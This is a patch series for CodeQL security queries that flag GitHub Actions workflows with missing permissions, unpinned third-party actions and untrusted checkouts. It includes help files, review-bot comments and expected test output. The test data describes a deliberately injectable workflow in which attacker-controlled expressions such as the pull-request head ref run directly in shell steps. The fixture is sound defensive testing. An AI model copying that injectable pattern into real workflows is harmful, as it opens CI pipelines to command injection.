+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -83,10 +83,10 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflowStmt - then result = this.(ReusableWorkflowStmt).getName() + then result = this.(ReusableWorkflowStmt).getLocation().getFile().getRelativePath() else if this instanceof CompositeActionStmt - then result = this.(CompositeActionStmt).getName() + then result = this.(CompositeActionStmt).getLocation().getFile().getRelativePath() else none() } } diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.md b/ql/src/Security/CWE-094/UntrustedCheckout.md new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql index 9c9b5f9eb26..bb6c0d9a029 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -6,6 +6,7 @@ * @kind problem * @problem.severity warning * @precision low + * @security-severity 9.3 * @id actions/untrusted-checkout * @tags actions * security diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/ql/src/Security/CWE-275/MissingActionsPermissions.md new file mode 100644 index 00000000000..5c0e433c5cb --- /dev/null +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.md 
@@ -0,0 +1,22 @@
+# Actions Job and Workflow Permissions are not set
+
+A GitHub Actions job or workflow hasn't set permissions to restrict privileges to the workflow job.
+A workflow job by default without the `permissions` key or a root workflow `permissions` will run with all the permissions which can be given to a workflow.
+
+## Recommendation
+
+Add the `permissions` key to the job or workflow (applied to all jobs) and set the permissions to the least privilege required to complete the task:
+
+```yaml
+name: "My workflow"
+permissions:
+ contents: read
+ pull-requests: write
+
+# or
+jobs:
+ my-job:
+ permissions:
+ contents: read
+ pull-requests: write
+```
diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql
new file mode 100644
index 00000000000..a4cecf18b78
--- /dev/null
+++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql
@@ -0,0 +1,23 @@
+/**
+ * @name Workflow does not contain permissions
+ * @description Workflows should contain permissions to provide a clear understanding has permissions to run the workflow.
+ * @kind problem
+ * @security-severity 5.0
+ * @problem.severity warning
+ * @precision high
+ * @id actions/missing-workflow-permissions
+ * @tags actions
+ * maintainability
+ * external/cwe/cwe-275
+ */
+
+import actions
+
+from WorkflowStmt workflow, JobStmt job
+where
+ job = workflow.getAJobStmt() and
+ (
+ not exists(workflow.getPermissionsStmt()) and
+ not exists(job.getPermissionsStmt())
+ )
+select job, "Actions Job or Workflow does not set permissions"
diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md
new file mode 100644
index 00000000000..855773e6a31
--- /dev/null
+++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.md
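Review bot: The `where` clause in MissingActionsPermissions.ql only tests that a `permissions` key exists, so a workflow or job declaring `permissions: write-all` passes even though it grants the broad token scope the help file warns about. If presence-only is the intended contract, the metadata should say so: the `@description` is garbled as written, and the query is tagged `maintainability` although it sits under Security/CWE-275 and carries a `@security-severity`. Suggested lines: `* @description Workflows and jobs should declare explicit least-privilege permissions instead of inheriting the default token permissions.` and `* security` in place of `* maintainability`. Since one alert is raised per job, the message could also say that neither the job nor its workflow sets `permissions`.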
@@ -0,0 +1,44 @@
+# Unpinned tag for 3rd party Action in workflow
+
+The individual jobs in a GitHub Actions workflow can interact with (and compromise) other jobs. For example, a job querying the environment variables used by a later job, writing files to a shared directory that a later job processes, or even more directly by interacting with the Docker socket and inspecting other running containers and executing commands in them. This means that a compromise of a single action within a workflow can be very significant, as that compromised action would have access to all secrets configured on your repository, and may be able to use the `GITHUB_TOKEN` to write to the repository. Consequently, there is significant risk in sourcing actions from third-party repositories on GitHub. For information on some of the steps an attacker could take, see "Security hardening for GitHub Actions."
+
+## Recommendation
+
+Pin an action to a full length commit SHA. This is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork.
+
+## Example
+
+In this example, the Actions workflow uses an unpinned version.
+
+```yaml
+name: "Unpinned Action Example"
+
+jobs:
+ build:
+ steps:
+ - name: Checkout repository
+ uses: actions-third-party-mirror/checkout@v3
+
+ - run: |
+ ./build.sh
+```
+
+The Action is pinned in the example below.
+
+```yaml
+name: "Pinned Action Example"
+
+jobs:
+ build:
+ steps:
+ - name: Checkout repository
+ uses: actions-mirror-third-party/checkout@ac593985615ec2ede58e132d2e21d2b1cbd6127c
+
+ - run: |
+ ./build.sh
+```
+
+## References
+
+- GitHub: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions)
+- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).
diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql
new file mode 100644
index 00000000000..12bc06481be
--- /dev/null
+++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql
@@ -0,0 +1,38 @@
+/**
+ * @name Unpinned tag for 3rd party Action in workflow
+ * @description Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack.
+ * @kind problem
+ * @security-severity 5.0
+ * @problem.severity warning
+ * @precision high
+ * @id actions/unpinned-tag
+ * @tags security
+ * actions
+ * external/cwe/cwe-829
+ */
+
+import actions
+
+bindingset[version]
+private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f0-9]{40}$") }
+
+bindingset[repo]
+private predicate isTrustedOrg(string repo) {
+ exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%"))
+}
+
+from StepUsesExpr uses, string repo, string version, WorkflowStmt workflow, string name
+where
+ uses.getCallee() = repo and
+ uses.getVersion() = version and
+ uses.getEnclosingWorkflowStmt() = workflow and
+ (
+ workflow.getName() = name
+ or
+ not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name
+ ) and
+ not isPinnedCommit(version) and
+ not isTrustedOrg(repo)
+select uses,
+ "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version +
+ "', not a pinned commit hash", uses, uses.toString()
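Review bot: In the `select` message of UnpinnedActionsTag.ql, `name` is bound to the workflow's name (or its file base name), yet the text reads `Unpinned 3rd party Action '<name>' step`, which presents it as the Action's name. Wording such as `"Unpinned 3rd party Action in workflow '" + name + "': step $@ uses '" + repo + ...` would match what is printed. `isTrustedOrg` exempts the `actions`, `github` and `advanced-security` owners, which neither the `@description` nor the help file mentions, so a reader cannot tell why a tag reference under those owners is not reported; a QLDoc line on the predicate, for example `/** Holds if `repo` belongs to an owner this query treats as first-party and does not require pinning for. */`, would record that policy. `isPinnedCommit` accepts exactly 40 hex characters, which is worth a short comment so the accepted reference form is explicit.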
diff --git a/ql/src/test/.github/workflows/cross1.yml b/ql/src/test/.github/workflows/cross1.yml index 9927aca8c56..946497250e6 100644 --- a/ql/src/test/.github/workflows/cross1.yml +++ b/ql/src/test/.github/workflows/cross1.yml @@ -3,6 +3,7 @@ name: Issue Workflow on: issues: types: [opened,edited] +permissions: {} jobs: #This job will check the issue to determine if it should be moved to a different repository redirectIssue: diff --git a/ql/src/test/.github/workflows/cross2.yml b/ql/src/test/.github/workflows/cross2.yml index ae24e21560b..ef8269151d7 100644 --- a/ql/src/test/.github/workflows/cross2.yml +++ b/ql/src/test/.github/workflows/cross2.yml @@ -2,6 +2,7 @@ name: Issue Type Predicter # This workflow uses https://github.com/DynamoDS/IssuesTypePredicter to predict the type of a github issue +permissions: {} on: issues: types: [opened, edited] diff --git a/ql/src/test/.github/workflows/cross3.yml b/ql/src/test/.github/workflows/cross3.yml index 21ee9ca7f61..ddb98c670c7 100644 --- a/ql/src/test/.github/workflows/cross3.yml +++ b/ql/src/test/.github/workflows/cross3.yml @@ -6,6 +6,7 @@ on: push: branches: - master +permissions: {} jobs: cherry_pick: runs-on: ubuntu-latest From 8e7e5d03a5b4ae096c9f6ad5a8c52684fc214681 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 11:15:38 +0100 Subject: [PATCH 0076/1267] fix(test): Add expected files --- build-dbs.sh | 5 - ql/lib/test/test.expected | 378 +++++++++++++++++++++++++++++++++++ ql/src/test/partial.expected | 28 +++ ql/src/test/test.expected | 152 ++++++++++++++ 4 files changed, 558 insertions(+), 5 deletions(-) delete mode 100755 build-dbs.sh create mode 100644 ql/lib/test/test.expected create mode 100644 ql/src/test/partial.expected create mode 100644 ql/src/test/test.expected diff --git a/build-dbs.sh b/build-dbs.sh deleted file mode 100755 index 073fcc40b44..00000000000 --- a/build-dbs.sh +++ /dev/null 
@@ -1,5 +0,0 @@ -#!/bin/bash -rm -rf ql/src/test/test.testproj || true -rm -rf ql/lib/test/test.testproj || true -codeql database create ql/src/test/test.testproj -l yaml -s ql/src/test -codeql database create ql/lib/test/test.testproj -l yaml -s ql/lib/test diff --git a/ql/lib/test/test.expected b/ql/lib/test/test.expected new file mode 100644 index 00000000000..4007e6454ea --- /dev/null +++ b/ql/lib/test/test.expected 
@@ -0,0 +1,378 @@ +files +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +yamlNodes +| .github/workflows/test.yml:1:1:1:2 | on | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:3:1:3:4 | jobs | +| .github/workflows/test.yml:4:3:4:6 | job1 | +| .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:5:5:11 | runs-on | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | +| .github/workflows/test.yml:7:5:7:11 | outputs | +| .github/workflows/test.yml:8:7:8:16 | job_output | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:10:5:10:9 | steps | +| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:11:9:11:12 | uses | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | +| .github/workflows/test.yml:12:9:12:12 | with | +| .github/workflows/test.yml:13:11:13:21 | fetch-depth | +| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | +| .github/workflows/test.yml:13:24:13:24 | 0 | +| .github/workflows/test.yml:15:9:15:12 | name | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | +| .github/workflows/test.yml:16:9:16:10 | id | +| .github/workflows/test.yml:16:13:16:18 | source | +| .github/workflows/test.yml:17:9:17:12 | uses | +| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | +| .github/workflows/test.yml:19:9:19:12 | name | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:19:15:19:43 | Remove ... 
d files | +| .github/workflows/test.yml:20:9:20:10 | id | +| .github/workflows/test.yml:20:13:20:16 | step | +| .github/workflows/test.yml:21:9:21:12 | uses | +| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | +| .github/workflows/test.yml:22:9:22:12 | with | +| .github/workflows/test.yml:23:11:23:16 | source | +| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:24:11:24:14 | find | +| .github/workflows/test.yml:24:17:24:21 | "foo" | +| .github/workflows/test.yml:25:11:25:17 | replace | +| .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:27:9:27:11 | run | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:29:9:29:11 | run | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:31:3:31:6 | job2 | +| .github/workflows/test.yml:32:5:32:11 | runs-on | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... 
-latest | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | +| .github/workflows/test.yml:34:5:34:6 | if | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:5:36:9 | needs | +| .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:38:5:38:9 | steps | +| .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:40:9:40:11 | run | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +jobNodes +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +stepNodes +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +allUsesNodes +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +stepUsesNodes +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +jobUsesNodes +usesSteps +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | fetch-depth | .github/workflows/test.yml:13:24:13:24 | 0 | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | find | .github/workflows/test.yml:24:17:24:21 | "foo" | +| .github/workflows/test.yml:19:9:26:6 | name: R ... 
d files | replace | .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +runSteps1 +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | id: sink | echo ${{needs.job1.outputs.job_output}} | +runSteps2 +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +runStepChildren +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... 
.ref }} | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:9:40:11 | run | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +varAccesses +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | needs.job1.outputs.job_output | +orphanVarAccesses +nonOrphanVarAccesses +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | needs.job1.outputs.job_output | .github/workflows/test.yml:39:9:40:53 | id: sink | +parentNodes +| .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:4:3:4:6 | job1 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:4:3:40:53 | job1: | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | uses: a ... 
kout@v4 | +| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:13:11:13:21 | fetch-depth | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | +| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | +| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | name: R ... 
d files | +| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:25:20:25:21 | "" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | .github/workflows/test.yml:39:9:40:53 | id: sink | +cfgNodes +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +dfNodes +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... 
.ref }} | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +exprNodes +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +argumentNodes +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} 